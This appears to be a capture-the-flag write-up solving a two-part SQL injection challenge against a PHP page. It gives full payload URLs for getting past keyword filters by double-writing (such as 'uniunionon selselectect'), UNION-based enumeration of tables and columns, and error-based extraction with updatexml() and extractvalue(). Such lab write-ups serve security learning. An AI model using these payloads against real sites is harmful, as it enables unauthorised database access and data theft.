I opened the title and found that there was nothing on the page, but the id parameter in the URL address bar was passed in. I changed id=1 to id=2, and the page information changed. I immediately thought that there might be SQL injection.
Test closure
id=1' //报错
id=1" //不报错
At this point, make sure that the closing method is single quotation mark closing.
Then you can use the exclusive OR method to test whether there is filtering for some SQL injection keywords. For example ^(length('or')!=0) If the return page is displayed normally, it proves that length('or')==0, that is, or is filtered. Through the test, it is found that select or and union is filtered , But we can bypass it by double writing.
Then guess the number of fields: the http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2--+dichotomy test has two fields.
Then guess the echo position:, http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,2--+and find that the position of 2 is the output point
Guess the name of the table:http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+
Guess the column name: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+
Guess the content of the field: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(flag1) from flag1--+
Submit the flag and find that this is not a flag, and then guess the content in the address: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(address) from flag1--+
At this point, you understand why the title is called multiple times.
Here I see that My id=1 and there is an Id parameter in the URL address bar. I guess it is still an injection problem.
Through the above method test, it is still closed with single quotes, and then this is an error injection, you can use updatexml() and extractvalue() functions to report error injection
extractvalue (target xml document, xml path): a function for querying XML documents
updatexml (target xml document, xml path, updated content): similar to extractvalue(), it is a function to update xml documents
Use updatexml() to inject:
guess the table name: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
guess the field name: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( column_name) from information_schema.columns where table_name='flag2'),0x7e),1)--+
guess the field content: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( flag2,address) from flag2),0x7e),1)--+
get the flag
Use extractvalue() to inject:
Guess the table name: http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
Guess the field name: http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag2'),0x7e))--+
Guess the content of the field:http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(flag2,address) from flag2),0x7e))--+